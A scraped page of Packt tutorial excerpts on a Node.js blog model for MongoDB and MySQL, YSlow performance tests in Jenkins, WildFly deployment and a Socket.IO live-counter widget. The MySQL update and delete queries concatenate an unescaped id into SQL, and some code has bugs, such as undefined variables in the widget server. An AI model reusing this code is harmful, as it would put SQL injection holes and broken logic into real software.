... }, remove: function(id, callback) { ... } } } else { return { add: function(data, callback) { ... }, update: function(data, callback) { ... }, get: function(callback) { ... }, remove: function(id, callback) { ... } } } } It starts with defining a few dependencies and settings for the MongoDB connection. Line number one requires the crypto module. We will use it to generate unique IDs for every article. The type variable defines which database is currently accessed. The third line initializes the MongoDB driver. We will use it to communicate with the database server. After that, we set the host and port for the connection and at the end a global collection variable, which will keep a reference to the collection with the articles. In MongoDB, the collections are similar to the tables in MySQL. The next logical step is to establish a database connection and perform the needed operations, as follows: connection = 'mongodb://'; connection += mongodb_host + ':' + mongodb_port; connection += '/blog-application'; client.connect(connection, function(err, database) { if(err) { throw new Error("Can't connect"); } else { console.log("Connection to MongoDB server successful."); collection = database.collection('articles'); } }); We pass the host and the port, and the driver is doing everything else. Of course, it is a good practice to handle the error (if any) and throw an exception. In our case, this is especially needed because without the information in the database, the frontend has nothing to show. The rest of the module contains methods to add, edit, retrieve, and delete records: return { add: function(data, callback) { var date = new Date(); data.id = crypto.randomBytes(20).toString('hex'); data.date = date.getFullYear() + "-" + date.getMonth() + "-" + date.getDate(); collection.insert(data, {}, callback || function() {}); }, update: function(data, callback) { collection.update( {ID: data.id}, data, {}, callback || function(){ } ); }, get: function(callback) { collection.find({}).toArray(callback); }, remove: function(id, callback) { collection.findAndModify( {ID: id}, [], {}, {remove: true}, callback ); } } The add and update methods accept the data parameter. That's a simple JavaScript object. For example, see the following code: { title: "Blog post title", text: "Article's text here ..." } The records are identified by an automatically generated unique id. The update method needs it in order to find out which record to edit. All the methods also have a callback. That's important, because the module is meant to be used as a black box, that is, we should be able to create an instance of it, operate with the data, and at the end continue with the rest of the application's logic. Using MySQL We're going to use an SQL type of database with MySQL. We will add a few more lines of code to the already working Articles.js model. The idea is to have a class that supports the two databases like two different options. At the end, we should be able to switch from one to the other, by simply changing the value of a variable. Similar to MongoDB, we need to first install the database to be able use it. The official download page is http://www.mysql.com/downloads. MySQL requires another Node.js module. It should be added again to the package.json file. We can see the module as follows: "dependencies": { "mongodb": "1.3.20", "mysql": "2.0.0" } Similar to the MongoDB solution, we need to firstly connect to the server. To do so, we need to know the values of the host, username, and password fields. And because the data is organized in databases, a name of the database. In MySQL, we put our data into different databases. So, the following code defines the needed variables: var mysql = require('mysql'), mysql_host = "127.0.0.1", mysql_user = "root", mysql_password = "", mysql_database = "blog_application", connection; The previous example leaves the password field empty but we should set the proper value of our system. The MySQL database requires us to define a table and its fields before we start saving data. So, consider the following code: CREATE TABLE IF NOT EXISTS `articles` ( `id` int(11) NOT NULL AUTO_INCREMENT, `title` longtext NOT NULL, `text` longtext NOT NULL, `date` varchar(100) NOT NULL, PRIMARY KEY (`id`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8 AUTO_INCREMENT=1 ; Once we have a database and its table set, we can continue with the database connection, as follows: connection = mysql.createConnection({ host: mysql_host, user: mysql_user, password: mysql_password }); connection.connect(function(err) { if(err) { throw new Error("Can't connect to MySQL."); } else { connection.query("USE " + mysql_database, function(err, rows, fields) { if(err) { throw new Error("Missing database."); } else { console.log("Successfully selected database."); } }) } }); The driver provides a method to connect to the server and execute queries. The first executed query selects the database. If everything is ok, you should see Successfully selected database as an output in your console. Half of the job is done. What we should do now is replicate the methods returned in the first MongoDB implementation. We need to do this because when we switch to the MySQL usage, the code using the class will not work. And by replicating them we mean that they should have the same names and should accept the same arguments. If we do everything correctly, at the end our application will support two types of databases. And all we have to do is change the value of the type variable: return { add: function(data, callback) { var date = new Date(); var query = ""; query += "INSERT INTO articles (title, text, date) VALUES ("; query += connection.escape(data.title) + ", "; query += connection.escape(data.text) + ", "; query += "'" + date.getFullYear() + "-" + date.getMonth() + "-" + date.getDate() + "'"; query += ")"; connection.query(query, callback); }, update: function(data, callback) { var query = "UPDATE articles SET "; query += "title=" + connection.escape(data.title) + ", "; query += "text=" + connection.escape(data.text) + " "; query += "WHERE id='" + data.id + "'"; connection.query(query, callback); }, get: function(callback) { var query = "SELECT * FROM articles ORDER BY id DESC"; connection.query(query, function(err, rows, fields) { if(err) { throw new Error("Error getting."); } else { callback(rows); } }); }, remove: function(id, callback) { var query = "DELETE FROM articles WHERE id='" + id + "'"; connection.query(query, callback); } } The code is a little longer than the one generated in the first MongoDB variant. That's because we needed to construct MySQL queries from the passed data. Keep in mind that we have to escape the information, which comes to the module. That's why we use connection.escape(). With these lines of code, our model is completed. Now we can add, edit, remove, or get data. Summary In this article, we saw how to select and initialize database using NoSQL with MongoDB and using MySQL required for writing a blog application with Node.js and AngularJS. Resources for Article: Further resources on this subject: So, what is Node.js? [Article] Understanding and Developing Node Modules [Article] An Overview of the Node Package Manager [Article]
Read more
  • 0
  • 0
  • 844

article-image-automating-performance-analysis-yslow-and-phantomjs
Packt
10 Jun 2014
12 min read
Save for later

Automating performance analysis with YSlow and PhantomJS

Packt
10 Jun 2014
12 min read
(For more resources related to this topic, see here.) Getting ready To run this article, the phantomjs binary will need to be accessible to the continuous integration server, which may not necessarily share the same permissions or PATH as our user. We will also need a target URL. We will use the PhantomJS port of the YSlow library to execute the performance analysis on our target web page. The YSlow library must be installed somewhere on the filesystem that is accessible to the continuous integration server. For our example, we have placed the yslow.js script in the tmp directory of the jenkins user's home directory. To find the jenkins user's home directory on a POSIX-compatible system, first switch to that user using the following command: sudo su - jenkins Then print the home directory to the console using the following command: echo $HOME We will need to have a continuous integration server set up where we can configure the jobs that will execute our automated performance analyses. The example that follows will use the open source Jenkins CI server. Jenkins CI is too large a subject to introduce here, but this article does not assume any working knowledge of it. For information about Jenkins CI, including basic installation or usage instructions, or to obtain a copy for your platform, visit the project website at http://jenkins-ci.org/. Our article uses version 1.552. The combination of PhantomJS and YSlow is in no way unique to Jenkins CI. The example aims to provide a clear illustration of automated performance testing that can easily be adapted to any number of continuous integration server environments. The article also uses several plugins on Jenkins CI to help facilitate our automated testing. These plugins include: Environment Injector Plugin JUnit Attachments Plugin TAP Plugin xUnit Plugin To run that demo site, we must have Node.js installed. In a separate terminal, change to the phantomjs-sandbox directory (in the sample code's directory), and start the app with the following command: node app.js How to do it… To execute our automated performance analyses in Jenkins CI, the first thing that we need to do is set up the job as follows: Select the New Item link in Jenkins CI. Give the new job a name (for example, YSlow Performance Analysis), select Build a free-style software project, and then click on OK. To ensure that the performance analyses are automated, we enter a Build Trigger for the job. Check off the appropriate Build Trigger and enter details about it. For example, to run the tests every two hours, during business hours, Monday through Friday, check Build periodically and enter the Schedule as H 9-16/2 * * 1-5. In the Build block, click on Add build step and then click on Execute shell. In the Command text area of the Execute Shell block, enter the shell commands that we would normally type at the command line, for example: phantomjs ${HOME}/tmp/yslow.js -i grade -threshold "B" -f junit http ://localhost:3000/css-demo > yslow.xml In the Post-build Actions block, click on Add post-build action and then click on Publish JUnit test result report. In the Test report XMLs field of the Publish JUnit Test Result Report block, enter *.xml. Lastly, click on Save to persist the changes to this job. Our performance analysis job should now run automatically according to the specified schedule; however, we can always trigger it manually by navigating to the job in Jenkins CI and clicking on Build Now. After a few of the performance analyses have completed, we can navigate to those jobs in Jenkins CI and see the results shown in the following screenshots: The landing page for a performance analysis project in Jenkins CI Note the Test Result Trend graph with the successes and failures. The Test Result report page for a specific build Note that the failed tests in the overall analysis are called out and that we can expand specific items to view their details. The All Tests view of the Test Result report page for a specific build Note that all tests in the performance analysis are listed here, regardless of whether they passed or failed, and that we can click into a specific test to view its details. How it works… The driving principle behind this article is that we want our continuous integration server to periodically and automatically execute the YSlow analyses for us so that we can monitor our website's performance over time. This way, we can see whether our changes are having an effect on overall site performance, receive alerts when performance declines, or even fail builds if we fall below our performance threshold. The first thing that we do in this article is set up the build job. In our example, we set up a new job that was dedicated to the YSlow performance analysis task. However, these steps could be adapted such that the performance analysis task is added onto an existing multipurpose job. Next, we configured when our job will run, adding Build Trigger to run the analyses according to a schedule. For our schedule, we selected H 9-16/2 * * 1-5, which runs the analyses every two hours, during business hours, on weekdays. While the schedule that we used is fine for demonstration purposes, we should carefully consider the needs of our project—chances are that a different Build Trigger will be more appropriate. For example, it may make more sense to select Build after other projects are built, and to have the performance analyses run only after the new code has been committed, built, and deployed to the appropriate QA or staging environment. Another alternative would be to select Poll SCM and to have the performance analyses run only after Jenkins CI detects new changes in source control. With the schedule configured, we can apply the shell commands necessary for the performance analyses. As noted earlier, the Command text area accepts the text that we would normally type on the command line. Here we type the following: phantomjs: This is for the PhantomJS executable binary ${HOME}/tmp/yslow.js: This is to refer to the copy of the YSlow library accessible to the Jenkins CI user -i grade: This is to indicate that we want the "Grade" level of report detail -threshold "B": This is to indicate that we want to fail builds with an overall grade of "B" or below -f junit: This is to indicate that we want the results output in the JUnit format http://localhost:3000/css-demo: This is typed in as our target URL > yslow.xml: This is to redirect the JUnit-formatted output to that file on the disk What if PhantomJS isn't on the PATH for the Jenkins CI user? A relatively common problem that we may experience is that, although we have permission on Jenkins CI to set up new build jobs, we are not the server administrator. It is likely that PhantomJS is available on the same machine where Jenkins CI is running, but the jenkins user simply does not have the phantomjs binary on its PATH. In these cases, we should work with the person administering the Jenkins CI server to learn its path. Once we have the PhantomJS path, we can do the following: click on Add build step and then on Inject environment variables; drag-and-drop the Inject environment variables block to ensure that it is above our Execute shell block; in the Properties Content text area, apply the PhantomJS binary's path to the PATH variable, as we would in any other script as follows: PATH=/path/to/phantomjs/bin:${PATH} After setting the shell commands to execute, we jump into the Post-build Actions block and instruct Jenkins CI where it can find the JUnit XML reports. As our shell command is redirecting the output into a file that is directly in the workspace, it is sufficient to enter an unqualified *.xml here. Once we have saved our build job in Jenkins CI, the performance analyses can begin right away! If we are impatient for our first round of results, we can click on Build Now for our job and watch as it executes the initial performance analysis. As the performance analyses are run, Jenkins CI will accumulate the results on the filesystem, keeping them until they are either manually removed or until a discard policy removes old build information. We can browse these accumulated jobs in the web UI for Jenkins CI, clicking on the Test Result link to drill into them. There's more… The first thing that bears expanding upon is that we should be thoughtful about what we use as the target URL for our performance analysis job. The YSlow library expects a single target URL, and as such, it is not prepared to handle a performance analysis job that is otherwise configured to target two or more URLs. As such, we must select a strategy to compensate for this, for example: Pick a representative page: We could manually go through our site and select the single page that we feel best represents the site as a whole. For example, we could pick the page that is "most average" compared to the other pages ("most will perform at about this level"), or the page that is most likely to be the "worst performing" page ("most pages will perform better than this"). With our representative page selected, we can then extrapolate performance for other pages from this specimen. Pick a critical page: We could manually select the single page that is most sensitive to performance. For example, we could pick our site's landing page (for example, "it is critical to optimize performance for first-time visitors"), or a product demo page (for example, "this is where conversions happen, so this is where performance needs to be best"). Again, with our performance-sensitive page selected, we can optimize the general cases around the specific one. Set up multiple performance analysis jobs: If we are not content to extrapolate site performance from a single specimen page, then we could set up multiple performance analysis jobs—one for each page on the site that we want to test. In this way, we could (conceivably) set up an exhaustive performance analysis suite. Unfortunately, the results will not roll up into one; however, once our site is properly tuned, we need to only look for the telltale red ball of a failed build in Jenkins CI. The second point worth considering is—where do we point PhantomJS and YSlow for the performance analysis? And how does the target URL's environment affect our interpretation of the results? If we are comfortable running our performance analysis against our production deploys, then there is not much else to discuss—we are assessing exactly what needs to be assessed. But if we are analyzing performance in production, then it's already too late—the slow code has already been deployed! If we have a QA or staging environment available to us, then this is potentially better; we can deploy new code to one of these environments for integration and performance testing before putting it in front of the customers. However, these environments are likely to be different from production despite our best efforts. For example, though we may be "doing everything else right", perhaps our staging server causes all traffic to come back from a single hostname, and thus, we cannot properly mimic a CDN, nor can we use cookie-free domains. Do we lower our threshold grade? Do we deactivate or ignore these rules? How can we tell apart the false negatives from the real warnings? We should put some careful thought into this—but don't be disheartened—better to have results that are slightly off than to have no results at all! Using TAP format If JUnit formatted results turn out to be unacceptable, there is also a TAP plugin for Jenkins CI. Test Anything Protocol (TAP) is a plain text-based report format that is relatively easy for both humans and machines to read. With the TAP plugin installed in Jenkins CI, we can easily configure our performance analysis job to use it. We would just make the following changes to our build job: In the Command text area of our Execute shell block, we would enter the following command: phantomjs ${HOME}/tmp/yslow.js -i grade -threshold "B" -f tap http ://localhost:3000/css-demo > yslow.tap In the Post-build Actions block, we would select Publish TAP Results instead of Publish JUnit test result report and enter yslow.tap in the Test results text field. Everything else about using TAP instead of JUnit-formatted results here is basically the same. The job will still run on the schedule we specify, Jenkins CI will still accumulate test results for comparison, and we can still explore the details of an individual test's outcomes. The TAP plugin adds an additional link in the job for us, TAP Extended Test Results, as shown in the following screenshot: One thing worth pointing out about using TAP results is that it is much easier to set up a single job to test multiple target URLs within a single website. We can enter multiple tests in the Execute Shell block (separating them with the && operator) and then set our Test Results target to be *.tap. This will conveniently combine the results of all our performance analyses into one. Summary In this article, we saw setting up of an automated performance analysis task on a continuous integration server (for example, Jenkins CI) using PhantomJS and the YSlow library. Resources for Article: Further resources on this subject: Getting Started [article] Introducing a feature of IntroJs [article] So, what is Node.js? [article]
Read more
  • 0
  • 0
  • 2066
Packt
21 May 2014
8 min read
Save for later

Running our first web application

Packt
21 May 2014
8 min read
(For more resources related to this topic, see here.) The standalone/deployments directory, as in the previous releases of JBoss Application Server, is the location used by end users to perform their deployments and applications are automatically deployed into the server at runtime. The artifacts that can be used to deploy are as follows: WAR (Web application Archive): This is a JAR file used to distribute a collection of JSP (Java Server Pages), servlets, Java classes, XML files, libraries, static web pages, and several other features that make up a web application. EAR (Enterprise Archive): This type of file is used by Java EE for packaging one or more modules within a single file. JAR (Java Archive): This is used to package multiple Java classes. RAR (Resource Adapter Archive): This is an archive file that is defined in the JCA specification as the valid format for deployment of resource adapters on application servers. You can deploy a RAR file on the AS Java as a standalone component or as part of a larger application. In both cases, the adapter is available to all applications using a lookup procedure. The deployment in WildFly has some deployment file markers that can be identified quickly, both by us and by WildFly, to understand what is the status of the artifact, whether it was deployed or not. The file markers always have the same name as the artifact that will deploy. A basic example is the marker used to indicate that my-first-app.war, a deployed application, will be the dodeploy suffix. Then in the directory to deploy, there will be a file created with the name my-first-app.war.dodeploy. Among these markers, there are others, explained as follows: dodeploy: This suffix is inserted by the user, which indicates that the deployment scanner will deploy the artifact indicated. This marker is mostly important for exploded deployments. skipdeploy: This marker disables the autodeploy mode while this file is present in the deploy directory, only for the artifact indicated. isdeploying: This marker is placed by the deployment scanner service to indicate that it has noticed a .dodeploy file or a new or updated autodeploy mode and is in the process of deploying the content. This file will be erased by the deployment scanner so the deployment process finishes. deployed: This marker is created by the deployment scanner to indicate that the content was deployed in the runtime. failed: This marker is created by the deployment scanner to indicate that the deployment process failed. isundeploying: This marker is created by the deployment scanner and indicates the file suffix .deployed was deleted and its contents will be undeployed. This marker will be deleted when the process is completely undeployed. undeployed: This marker is created by the deployment scanner to indicate that the content was undeployed from the runtime. pending: This marker is placed by the deployment scanner service to indicate that it has noticed the need to deploy content but has not yet instructed the server to deploy it. When we deploy our first application, we'll see some of these marker files, making it easier to understand their functions. To support learning, the small applications that I made will be available on GitHub (https://github.com) and packaged using Maven (for further details about Maven, you can visit http://maven.apache.org/). To begin the deployment process, we perform a checkout of the first application. First of all you need to install the Git client for Linux. To do this, use the following command: [root@wfly_book ~]# yum install git –y Git is also necessary to perform the Maven installation so that it is possible to perform the packaging process of our first application. Maven can be downloaded from http://maven.apache.org/download.cgi. Once the download is complete, create a directory that will be used to perform the installation of Maven and unzip it into this directory. In my case, I chose the folder /opt as follows: [root@wfly_book ~]# mkdir /opt/maven Unzip the file into the newly created directory as follows: [root@wfly_book maven]# tar -xzvf /root/apache-maven-3.2.1-bin.tar.gz [root@wfly_book maven]# cd apache-maven-3.2.1/ Run the mvn command and, if any errors are returned, we must set the environment variable M3_HOME, described as follows: [root@wfly_book ~]# mvn -bash: mvn: command not found If the error indicated previously occurs again, it is because the Maven binary was not found by the operating system; in this scenario, we must create and configure the environment variable that is responsible for this. First, two settings, populate the environment variable with the Maven installation directory and enter the directory in the PATH environment variable in the necessary binaries. Access and edit the /etc/profile file, taking advantage of the configuration that we did earlier with the Java environment variable, and see how it will look with the Maven configuration file as well: #Java and Maven configuration export JAVA_HOME="/usr/java/jdk1.7.0_45" export M3_HOME="/opt/maven/apache-maven-3.2.1" export PATH="$PATH:$JAVA_HOME/bin:$M3_HOME/bin" Save and close the file and then run the following command to apply the following settings: [root@wfly_book ~]# source /etc/profile To verify the configuration performed, run the following command: [root@wfly_book ~]# mvn -version Well, now that we have the necessary tools to check out the application, let's begin. First, set a directory where the application's source codes will be saved as shown in the following command: [root@wfly_book opt]# mkdir book_apps [root@wfly_book opt]# cd book_apps/ Let's check out the project using the command, git clone; the repository is available at https://github.com/spolti/wfly_book.git. Perform the checkout using the following command: [root@wfly_book book_apps]# git clone https://github.com/spolti/wfly_book.git Access the newly created directory using the following command: [root@wfly_book book_apps]# cd wfly_book/ For the first example, we will use the application called app1-v01, so access this directory and build and deploy the project by issuing the following commands. Make sure that the WildFly server is already running. The first build is always very time-consuming, because Maven will download all the necessary libs to compile the project, project dependencies, and Maven libraries. [root@wfly_book wfly_book]# cd app1-v01/ [root@wfly_book app1-v01]# mvn wildfly:deploy For more details about the WildFly Maven plugin, please take a look at https://docs.jboss.org/wildfly/plugins/maven/latest/index.html. The artifact will be generated and automatically deployed on WildFly Server. Note that a message similar to the following is displayed stating that the application was successfully deployed: INFO [org.jboss.as.server] (ServerService Thread Pool -- 29) JBAS018559: Deployed "app1-v01.war" (runtime-name : "app1-v01.war") When we perform the deployment of some artifact, and if we have not configured the virtual host or context root address, then in order to access the application we always need to use the application name without the suffix, because our application's address will be used for accessing it. The structure to access the application is http://<your-ip-address>:<port-number>/app1-v01/. In my case, it would be http://192.168.11.109:8080/app1-v01/. See the following screenshot of the application running. This application is very simple and is made using JSP and rescuing some system properties. Note that in the deployments directory we have a marker file that indicates that the application was successfully deployed, as follows: [root@wfly_book deployments]# ls -l total 20 -rw-r--r--. 1 wildfly wildfly 2544 Jan 21 07:33 app1-v01.war -rw-r--r--. 1 wildfly wildfly 12 Jan 21 07:33 app1-v01.war.deployed -rw-r--r--. 1 wildfly wildfly 8870 Dec 22 04:12 README.txt To undeploy the application without having to remove the artifact, we need only remove the app1-v01.war.deployed file. This is done using the following command: [root@wfly_book ~]# cd $JBOSS_HOME/standalone/deployments [root@wfly_book deployments]# rm app1-v01.war.deployed rm: remove regular file `app1-v01.war.deployed'? y In the previous option, you will also need to press Y to remove the file. You can also use the WildFly Maven plugin for undeployment, using the following command: [root@wfly_book deployments]# mvn wildfly:undeploy Notice that the log is reporting that the application was undeployed and also note that a new marker, .undeployed, has been added indicating that the artifact is no longer active in the runtime server as follows: INFO [org.jboss.as.server] (DeploymentScanner-threads - 1) JBAS018558: Undeployed "app1-v01.war" (runtime-name: "app1-v01.war") And run the following command: [root@wfly_book deployments]# ls -l total 20 -rw-r--r--. 1 wildfly wildfly 2544 Jan 21 07:33 app1-v01.war -rw-r--r--. 1 wildfly wildfly 12 Jan 21 09:44 app1-v01.war.undeployed -rw-r--r--. 1 wildfly wildfly 8870 Dec 22 04:12 README.txt [root@wfly_book deployments]# If you make undeploy using the WildFly Maven plugin, the artifact will be deleted from the deployments directory. Summary In this article, we learn how to configure an application using a virtual host, the context root, and also how to use the logging tools that we now have available to use Java in some of our test applications, among several other very interesting settings. Resources for Article: Further resources on this subject: JBoss AS Perspective [Article] JBoss EAP6 Overview [Article] JBoss RichFaces 3.3 Supplemental Installation [Article]
Read more
  • 0
  • 0
  • 1091

article-image-creating-real-time-widget
Packt
22 Apr 2014
11 min read
Save for later

Creating a real-time widget

Packt
22 Apr 2014
11 min read
(For more resources related to this topic, see here.) The configuration options and well thought out methods of socket.io make for a highly versatile library. Let's explore the dexterity of socket.io by creating a real-time widget that can be placed on any website and instantly interfacing it with a remote Socket.IO server. We're doing this to begin providing a constantly updated total of all users currently on the site. We'll name it the live online counter (loc for short). Our widget is for public consumption and should require only basic knowledge, so we want a very simple interface. Loading our widget through a script tag and then initializing the widget with a prefabricated init method would be ideal (this allows us to predefine properties before initialization if necessary). Getting ready We'll need to create a new folder with some new files: widget_server.js, widget_client.js, server.js, and index.html. How to do it... Let's create the index.html file to define the kind of interface we want as follows: <html> <head> <style> #_loc {color:blue;} /* widget customization */ </style> </head> <body> <h1> My Web Page </h1> <script src = http://localhost:8081 > </script> <script> locWidget.init(); </script> </body> </html> The localhost:8081 domain is where we'll be serving a concatenated script of both the client-side socket.io code and our own widget code. By default, Socket.IO hosts its client-side library over HTTP while simultaneously providing a WebSocket server at the same address, in this case localhost:8081. See the There's more… section for tips on how to configure this behavior. Let's create our widget code, saving it as widget_client.js: ;(function() { window.locWidget = { style : 'position:absolute;bottom:0;right:0;font-size:3em', init : function () { var socket = io.connect('http://localhost:8081'), style = this.style; socket.on('connect', function () { var head = document.head, body = document.body, loc = document.getElementById('_lo_count'); if (!loc) { head.innerHTML += '<style>#_loc{' + style + '}</style>'; loc = document.createElement('div'); loc.id = '_loc'; loc.innerHTML = '<span id=_lo_count></span>'; body.appendChild(loc); } socket.on('total', function (total) { loc.innerHTML = total; }); }); } } }()); We need to test our widget from multiple domains. We'll just implement a quick HTTP server (server.js) to serve index.html so we can access it by http://127.0.0.1:8080 and http://localhost:8080, as shown in the following code: var http = require('http'); var fs = require('fs'); var clientHtml = fs.readFileSync('index.html'); http.createServer(function (request, response) { response.writeHead(200, {'Content-type' : 'text/html'}); response.end(clientHtml); }).listen(8080); Finally, for the server for our widget, we write the following code in the widget_server.js file: var io = require('socket.io')(), totals = {}, clientScript = Buffer.concat([ require('socket.io/node_modules/socket.io-client').source, require('fs').readFileSync('widget_client.js') ]); io.static(false); io.attach(require('http').createServer(function(req, res){ res.setHeader('Content-Type', 'text/javascript; charset=utf-8'); res.write(sioclient.source); res.write(widgetScript); res.end(); }).listen(8081)); io.on('connection', function (socket) { var origin = socket.request.socket.domain || 'local'; totals[origin] = totals[origin] || 0; totals[origin] += 1; socket.join(origin); io.sockets.to(origin).emit('total', totals[origin]); socket.on('disconnect', function () { totals[origin] -= 1; io.sockets.to(origin).emit('total', totals[origin]); }); }); To test it, we need two terminals; in the first one, we execute the following command: node widget_server.js In the other terminal, we execute the following command: node server.js We point our browser to http://localhost:8080 by opening a new tab or window and navigating to http://localhost:8080. Again, we will see the counter rise by one. If we close either window, it will drop by one. We can also navigate to http://127.0.0.1:8080 to emulate a separate origin. The counter at this address is independent from the counter at http://localhost:8080. How it works... The widget_server.js file is the powerhouse of this recipe. We start by using require with socket.io and calling it (note the empty parentheses following require); this becomes our io instance. Under this is our totals object; we'll be using this later to store the total number of connected clients for each domain. Next, we create our clientScript variable; it contains both the socket.io client code and our widget_client.js code. We'll be serving this to all HTTP requests. Both scripts are stored as buffers, not strings. We could simply concatenate them with the plus (+) operator; however, this would force a string conversion first, so we use Buffer.concat instead. Anything that is passed to res.write or res.end is converted to a Buffer before being sent across the wire. Using the Buffer.concat method means our data stays in buffer format the whole way through instead of being a buffer, then a string then a buffer again. When we require socket.io at the top of widget_server.js, we call it to create an io instance. Usually, at this point, we would pass in an HTTP server instance or else a port number, and optionally pass in an options object. To keep our top variables tidy, however, we use some configuration methods available on the io instance after all our requires. The io.static(false) call prevents socket.io from providing its client-side code (because we're providing our own concatenated script file that contains both the socket.io client-side code and our widget code). Then we use the io.attach call to hook up our socket.io server with an HTTP server. All requests that use the http:// protocol will be handled by the server we pass to io.attach, and all ws:// protocols will be handled by socket.io (whether or not the browser supports the ws:// protocol). We're only using the http module once, so we require it within the io.attach call; we use it's createServer method to serve all requests with our clientScript variable. Now, the stage is set for the actual socket action. We wait for a connection by listening for the connection event on io.sockets. Inside the event handler, we use a few as yet undiscussed socket.io qualities. WebSocket is formed when a client initiates a handshake request over HTTP and the server responds affirmatively. We can access the original request object with socket.request. The request object itself has a socket (this is the underlying HTTP socket, not our socket.io socket; we can access this via socket.request.socket. The socket contains the domain a client request came from. We load socket.request.socket.domain into our origin object unless it's null or undefined, in which case we say the origin is 'local'. We extract (and simplify) the origin object because it allows us to distinguish between websites that use a widget, enabling site-specific counts. To keep count, we use our totals object and add a property for every new origin object with an initial value of 0. On each connection, we add 1 to totals[origin] while listening to our socket; for the disconnect event, we subtract 1 from totals[origin]. If these values were exclusively for server use, our solution would be complete. However, we need a way to communicate the total connections to the client, but on a site by site basis. Socket.IO has had a handy new feature since Socket.IO version 0.7 that allows us to group sockets into rooms by using the socket.join method. We cause each socket to join a room named after its origin, then we use the io.sockets.to(origin).emit method to instruct socket.io to only emit to sockets that belongs to the originating sites room. In both the io.sockets connection and socket disconnect events, we emit our specific totals to corresponding sockets to update each client with the total number of connections to the site the user is on. The widget_client.js file simply creates a div element called #_loc and updates it with any new totals it receives from widget_server.js. There's more... Let's look at how our app could be made more scalable, as well as looking at another use for WebSockets. Preparing for scalability If we were to serve thousands of websites, we would need scalable memory storage, and Redis would be a perfect fit. It operates in memory but also allows us to scale across multiple servers. We'll need Redis installed along with the Redis module. We'll alter our totals variable so it contains a Redis client instead of a JavaScript object: var io = require('socket.io')(), totals = require('redis').createClient(), //other variables Now, we modify our connection event handler as shown in the following code: io.sockets.on('connection', function (socket) { var origin = (socket.handshake.xdomain) ? url.parse(socket.handshake.headers.origin).hostname : 'local'; socket.join(origin); totals.incr(origin, function (err, total) { io.sockets.to(origin).emit('total', total); }); socket.on('disconnect', function () { totals.decr(origin, function (err, total) { io.sockets.to(origin).emit('total', total); }); }); }); Instead of adding 1 to totals[origin], we use the Redis INCR command to increment a Redis key named after origin. Redis automatically creates the key if it doesn't exist. When a client disconnects, we do the reverse and readjust totals using DECR. WebSockets as a development tool When developing a website, we often change something small in our editor, upload our file (if necessary), refresh the browser, and wait to see the results. What if the browser would refresh automatically whenever we saved any file relevant to our site? We can achieve this with the fs.watch method and WebSockets. The fs.watch method monitors a directory, executing a callback whenever a change to any files in the folder occurs (but it doesn't monitor subfolders). The fs.watch method is dependent on the operating system. To date, fs.watch has also been historically buggy (mostly under Mac OS X). Therefore, until further advancements, fs.watch is suited purely to development environments rather than production (you can monitor how fs.watch is doing by viewing the open and closed issues at https://github.com/joyent/node/search?q=fs.watch&ref=cmdform&state=open&type=Issues). Our development tool could be used alongside any framework, from PHP to static files. For the server counterpart of our tool, we'll configure watcher.js: var io = require('socket.io')(), fs = require('fs'), totals = {}, watcher = function () { var socket = io.connect('ws://localhost:8081'); socket.on('update', function () { location.reload(); }); }, clientScript = Buffer.concat([ require('socket.io/node_modules/socket.io-client').source, Buffer(';(' + watcher + '());') ]); io.static(false); io.attach(require('http').createServer(function(req, res){ res.setHeader('Content-Type', 'text/javascript; charset=utf-8'); res.end(clientScript); }).listen(8081)); fs.watch('content', function (e, f) { if (f[0] !== '.') { io.sockets.emit('update'); } }); Most of this code is familiar. We make a socket.io server (on a different port to avoid clashing), generate a concatenated socket.io.js plus client-side watcher code file, and deliver it via our attached server. Since this is a quick tool for our own development uses, our client-side code is written as a normal JavaScript function (our watcher variable), converted to a string while wrapping it in self-calling function code, and then changed to Buffer so it's compatible with Buffer.concat. The last piece of code calls the fs.watch method where the callback receives the event name (e) and the filename (f). We check that the filename isn't a hidden dotfile. During a save event, some filesystems or editors will change the hidden files in the directory, thus triggering multiple callbacks and sending several messages at high speed, which can cause issues for the browser. To use it, we simply place it as a script within every page that is served (probably using server-side templating). However, for demonstration purposes, we simply place the following code into content/index.html: <script src = http://localhost:8081/socket.io/watcher.js > </script> Once we fire up server.js and watcher.js, we can point our browser to http://localhost:8080 and see the familiar excited Yay!. Any changes we make and save (either to index.html, styles.css, script.js, or the addition of new files) will be almost instantly reflected in the browser. The first change we can make is to get rid of the alert box in the script.js file so that the changes can be seen fluidly. Summary We saw how we could create a real-time widget in this article. We also used some third-party modules to explore some of the potential of the powerful combination of Node and WebSockets. Resources for Article: Further resources on this subject: Understanding and Developing Node Modules [Article] So, what is Node.js? [Article] Setting up Node [Article]
Read more
  • 0
  • 0
  • 1772